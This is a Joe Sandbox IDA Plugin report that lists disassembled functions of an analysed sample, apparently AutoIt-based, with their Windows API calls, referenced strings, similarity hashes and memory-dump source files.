Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 0ac9c6688cfb5447927213b1d50ecbb3e38afae5e94c065d89a32c4ded5f9331
Instruction ID: f66183586dc8f7203eff9ecc9ff41d41683893089545d3a5204aea0674def26f
Opcode Fuzzy Hash: 0ac9c6688cfb5447927213b1d50ecbb3e38afae5e94c065d89a32c4ded5f9331
Instruction Fuzzy Hash: DB717771140204AFD721CF68CC49FAB77E5FBD8300F04862DF98A872A1D7B1A956CB52

Function 00A7CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

DragQueryPoint.SHELL32(?,?), ref: 00A7CCCF

Part of subcall function 00A7B1A9: ClientToScreen.USER32(?,?), ref: 00A7B1D2
Part of subcall function 00A7B1A9: GetWindowRect.USER32(?,?), ref: 00A7B248
Part of subcall function 00A7B1A9: PtInRect.USER32(?,?,00A7C6BC), ref: 00A7B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00A7CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A7CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A7CD66
_wcscat.LIBCMT ref: 00A7CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A7CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00A7CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00A7CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00A7CDFF
DragFinish.SHELL32(?), ref: 00A7CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A7CEF9

Strings

@GUI_DRAGID, xrefs: 00A7CE71
@GUI_DRAGFILE, xrefs: 00A7CEA8
@GUI_DROPID, xrefs: 00A7CE26

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: eef5026cdf240741ea34fcf066ffc33d388e92acd8e9a2420791ccd4eafb96c3
Instruction ID: 8a279704281d78aa94f603618fe8df9f0370862ef7d1fd24d3120dc440a10d7c
Opcode Fuzzy Hash: eef5026cdf240741ea34fcf066ffc33d388e92acd8e9a2420791ccd4eafb96c3
Instruction Fuzzy Hash: 06615971108305AFD711DF90DC85EAFBBE8EFC9750F004A2DF695921A1DB709A49CB62

Function 00A582D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00A5831A
VariantCopy.OLEAUT32(00000000,?), ref: 00A58323
VariantClear.OLEAUT32(00000000), ref: 00A5832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A5841D
__swprintf.LIBCMT ref: 00A5844D
VarR8FromDec.OLEAUT32(?,?), ref: 00A58479
VariantInit.OLEAUT32(?), ref: 00A5852A
SysFreeString.OLEAUT32(?), ref: 00A585BE
VariantClear.OLEAUT32(?), ref: 00A58618
VariantClear.OLEAUT32(?), ref: 00A58627
VariantInit.OLEAUT32(00000000), ref: 00A58665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00A58447
Default, xrefs: 00A584DA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 9a7fc4938ff88e4d2c9877fc1361c2a2e4556ba9d59895ab9d57c7da59e61f1c
Instruction ID: b3b61b6607e26fa1893036dbdc9dd547478eb7cca1c7e6ecf0133d83beedb809
Opcode Fuzzy Hash: 9a7fc4938ff88e4d2c9877fc1361c2a2e4556ba9d59895ab9d57c7da59e61f1c
Instruction Fuzzy Hash: 61D1E131604119EBDB209FA5C885BAEB7B4BF04B12F148595EC05BF191DF38EC48DBA0

Function 00A749CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A74A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A74AAC

Strings

SELECT, xrefs: 00A74C5D
EXPAND, xrefs: 00A74B5E
ISCHECKED, xrefs: 00A74C2F
GETTOTALCOUNT, xrefs: 00A74A93
GETSELECTED, xrefs: 00A74BBC
GETITEMCOUNT, xrefs: 00A74B8E
CHECK, xrefs: 00A74ACC
COLLAPSE, xrefs: 00A74AF2
EXISTS, xrefs: 00A74B15
GETTEXT, xrefs: 00A74BFF
UNCHECK, xrefs: 00A74C88

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 62f6e3c036b3d8aad502ed0f31eceed02c3f8a7a1813b7dc302292bbb0ffb8e7
Instruction ID: 8755adfd0946222cf255d7320ea4c3246e99cb10c5ed0472f19f8a821e89538c
Opcode Fuzzy Hash: 62f6e3c036b3d8aad502ed0f31eceed02c3f8a7a1813b7dc302292bbb0ffb8e7
Instruction Fuzzy Hash: FB916C342047159FCB04EF20C951ABAB7A1BF98354F11C968F99A5B3A2DB31FD49CB81

Function 00A5E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A5E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A5E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A5E33B
__wsplitpath.LIBCMT ref: 00A5E399
_wcscat.LIBCMT ref: 00A5E3B1
_wcscat.LIBCMT ref: 00A5E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A5E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00A5E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00A5E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00A5E43F
_wcscpy.LIBCMT ref: 00A5E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A5E48A

Strings

*.*, xrefs: 00A5E445

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 1880c1209e2f8afbb81d6e3cceab756fa921cc93fe143eecb97fc5fd9037ac35
Instruction ID: 71247ea8e52406ba55c177ac791993b094295f85a8f76f2d8b0e997413fbe285
Opcode Fuzzy Hash: 1880c1209e2f8afbb81d6e3cceab756fa921cc93fe143eecb97fc5fd9037ac35
Instruction Fuzzy Hash: 9F613B725042459FC714EF64C844AAFB3E8FF89314F04491EFA9987251EB35EA49CB92

Function 00A5A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A5A2C2

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A5A2E3
__swprintf.LIBCMT ref: 00A5A33C
__swprintf.LIBCMT ref: 00A5A355
_wprintf.LIBCMT ref: 00A5A3FC
_wprintf.LIBCMT ref: 00A5A41A

Strings

^ ERROR , xrefs: 00A5A391
Line %d (File "%s"):, xrefs: 00A5A336, 00A5A34F
"%s" (%d) : ==> %s:%s%s, xrefs: 00A5A3F7
"%s" (%d) : ==> %s:, xrefs: 00A5A415
Error: , xrefs: 00A5A3C4
Incorrect parameters to object property !, xrefs: 00A5A39E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 39f1177ed9887974f18212d6303ae1c8cbf5a1d4c359451d8c51effe5d66db12
Instruction ID: 187dd2f4a9c04c845eb26d0dd090978cb1d19b6eebba127000664c4b54b21f01
Opcode Fuzzy Hash: 39f1177ed9887974f18212d6303ae1c8cbf5a1d4c359451d8c51effe5d66db12
Instruction Fuzzy Hash: B2519E72900219BACF15EBE0DE86EEEB779BF14341F100265F505B20A2EB712F59CB61

Function 00A50065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00A63FF9,00000000), ref: 00A5009A
LoadStringW.USER32(00000000,?,00A3F8B8,00000001), ref: 00A500A3

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

GetModuleHandleW.KERNEL32(00000000,00AB7310,?,00000FFF,?,?,00A3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00A63FF9,00000000,00000001), ref: 00A500C5
LoadStringW.USER32(00000000,?,00A3F8B8,00000001), ref: 00A500C8
__swprintf.LIBCMT ref: 00A50118
__swprintf.LIBCMT ref: 00A50129
_wprintf.LIBCMT ref: 00A501D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A501E9

Strings

Line %d (File "%s"):, xrefs: 00A50112
^ ERROR, xrefs: 00A5017E
Line %d:, xrefs: 00A50123
%s (%d) : ==> %s: %s %s, xrefs: 00A501CD
Error: , xrefs: 00A501A0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 5fa9d7545aed5d2bec1f025332f41e1dbb271da1c403e438c44a0bdad395015b
Instruction ID: e1d26026093eb4c49caec86571b7382facb7c477d89782f0481f7ecf4c34226b
Opcode Fuzzy Hash: 5fa9d7545aed5d2bec1f025332f41e1dbb271da1c403e438c44a0bdad395015b
Instruction Fuzzy Hash: 34413C7280021DAACF15EBE0DE96EEEB778AF18381F500165F505B20D2EB756F49CB61

Function 00A5A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

CharLowerBuffW.USER32(?,?), ref: 00A5AA0E
GetDriveTypeW.KERNEL32 ref: 00A5AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5AB08

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Strings

wait, xrefs: 00A5AAC5
open , xrefs: 00A5AA6A
set cd door , xrefs: 00A5AAA9
close, xrefs: 00A5AA14
closed, xrefs: 00A5AA22, 00A5AA2B
close cd wait, xrefs: 00A5AAF3
open, xrefs: 00A5AA35
type cdaudio alias cd wait, xrefs: 00A5AA86

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 276e25189df10be824f05788cc70171d07a5ad961857c427b663a188fec3cb9a
Instruction ID: cdd74fa476c1c98540eb6b1736986582b35a744c6306b032943301d990dd5c44
Opcode Fuzzy Hash: 276e25189df10be824f05788cc70171d07a5ad961857c427b663a188fec3cb9a
Instruction Fuzzy Hash: 92513B712042099FC700EF10D9919AAB7E5FF98758F10896DF896572A2DB31AE09CB92

Function 00A5A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A5A852
__swprintf.LIBCMT ref: 00A5A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A5A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A5A8D6
_memset.LIBCMT ref: 00A5A8F5
_wcsncpy.LIBCMT ref: 00A5A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A5A966
CloseHandle.KERNEL32(00000000), ref: 00A5A971
RemoveDirectoryW.KERNEL32(?), ref: 00A5A97A
CloseHandle.KERNEL32(00000000), ref: 00A5A984

Strings

:, xrefs: 00A5A895
\??\%s, xrefs: 00A5A86E
\, xrefs: 00A5A88A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 15535bf3c0ae98c803d1ccc24f672974528f31255a0b21f1db9b3fe476e497e8
Instruction ID: 1485f2e6be3a36f722371c518d815ba4860bbf82d2f18100c54c761df27ff71f
Opcode Fuzzy Hash: 15535bf3c0ae98c803d1ccc24f672974528f31255a0b21f1db9b3fe476e497e8
Instruction Fuzzy Hash: 7E31A57260021AABDB21DFA0DC49FEB77BCFF89711F1041B6FA08D6150E77096898B25

Function 00A7C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A7982C,?,?), ref: 00A7C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C0F7
GlobalLock.KERNEL32(00000000), ref: 00A7C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C10F
GlobalUnlock.KERNEL32(00000000), ref: 00A7C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A7982C,?,?,00000000,?), ref: 00A7C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A83C7C,?), ref: 00A7C149
GlobalFree.KERNEL32(00000000), ref: 00A7C159
GetObjectW.GDI32(00000000,00000018,?), ref: 00A7C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A7C1A8
DeleteObject.GDI32(00000000), ref: 00A7C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A7C1E6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 6236d4c036e93f70bb5a7055621a54af38a1c9084ed0680c46a7c08cee41ca1d
Instruction ID: e9c76a4f4412858db59b0ebca6b9262e01a058a0c47e3bb6f9689faf0a1e6237
Opcode Fuzzy Hash: 6236d4c036e93f70bb5a7055621a54af38a1c9084ed0680c46a7c08cee41ca1d
Instruction Fuzzy Hash: 6A414B71540204EFCB61DFA4DC8CEAA7BB8EF89721F108158F909E7261D7709946DB60

Function 00A7C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A7C8A4
GetFocus.USER32 ref: 00A7C8B4
GetDlgCtrlID.USER32(00000000), ref: 00A7C8BF
_memset.LIBCMT ref: 00A7C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A7CA15
GetMenuItemCount.USER32(?), ref: 00A7CA35
GetMenuItemID.USER32(?,00000000), ref: 00A7CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A7CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A7CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A7CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A7CB31

Strings

0, xrefs: 00A7C9E2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: cf74a45e0fa7129f6a0b36e51a715cf33f715fd597e78cf12f6350699e65ec3e
Instruction ID: 955311123dd1605d0374a283c78adfed218d996f6626c38e0182cdec852b8c4e
Opcode Fuzzy Hash: cf74a45e0fa7129f6a0b36e51a715cf33f715fd597e78cf12f6350699e65ec3e
Instruction Fuzzy Hash: 62815A71608305AFD710CF14CD85E6BBBE9EB88364F00C92DF99997291D770D945CBA2

Function 00A48ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A48E3C
Part of subcall function 00A48E20: GetLastError.KERNEL32(?,00A48900,?,?,?), ref: 00A48E46
Part of subcall function 00A48E20: GetProcessHeap.KERNEL32(00000008,?,?,00A48900,?,?,?), ref: 00A48E55
Part of subcall function 00A48E20: HeapAlloc.KERNEL32(00000000,?,00A48900,?,?,?), ref: 00A48E5C
Part of subcall function 00A48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A48E73

Part of subcall function 00A48EBD: GetProcessHeap.KERNEL32(00000008,00A48916,00000000,00000000,?,00A48916,?), ref: 00A48EC9
Part of subcall function 00A48EBD: HeapAlloc.KERNEL32(00000000,?,00A48916,?), ref: 00A48ED0
Part of subcall function 00A48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A48916,?), ref: 00A48EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A48B2E
_memset.LIBCMT ref: 00A48B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A48B62
GetLengthSid.ADVAPI32(?), ref: 00A48B73
GetAce.ADVAPI32(?,00000000,?), ref: 00A48BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A48BCC
GetLengthSid.ADVAPI32(?), ref: 00A48BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A48BF8
HeapAlloc.KERNEL32(00000000), ref: 00A48BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A48C20
CopySid.ADVAPI32(00000000), ref: 00A48C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A48C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A48C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A48C92

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: fc3addb2b130c14984275ff65a06db88d9a25e80936a80dcaf3186843f23cf4b
Instruction ID: d6a4af48400a0c9eed1074ff6b345de92b0c045f622ccd1c85613dcb3797636d
Opcode Fuzzy Hash: fc3addb2b130c14984275ff65a06db88d9a25e80936a80dcaf3186843f23cf4b
Instruction Fuzzy Hash: 60615879900209EFDF10DFA5ED85EEEBBB9FF44300F048169E915A6290DB799A05CB60

Function 00A67A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A67A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A67A85
CreateCompatibleDC.GDI32(?), ref: 00A67A91
SelectObject.GDI32(00000000,?), ref: 00A67A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A67AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A67B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A67B52
SelectObject.GDI32(00000006,?), ref: 00A67B5A
DeleteObject.GDI32(?), ref: 00A67B63
DeleteDC.GDI32(00000006), ref: 00A67B6A
ReleaseDC.USER32(00000000,?), ref: 00A67B75

Strings

(, xrefs: 00A67AFA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

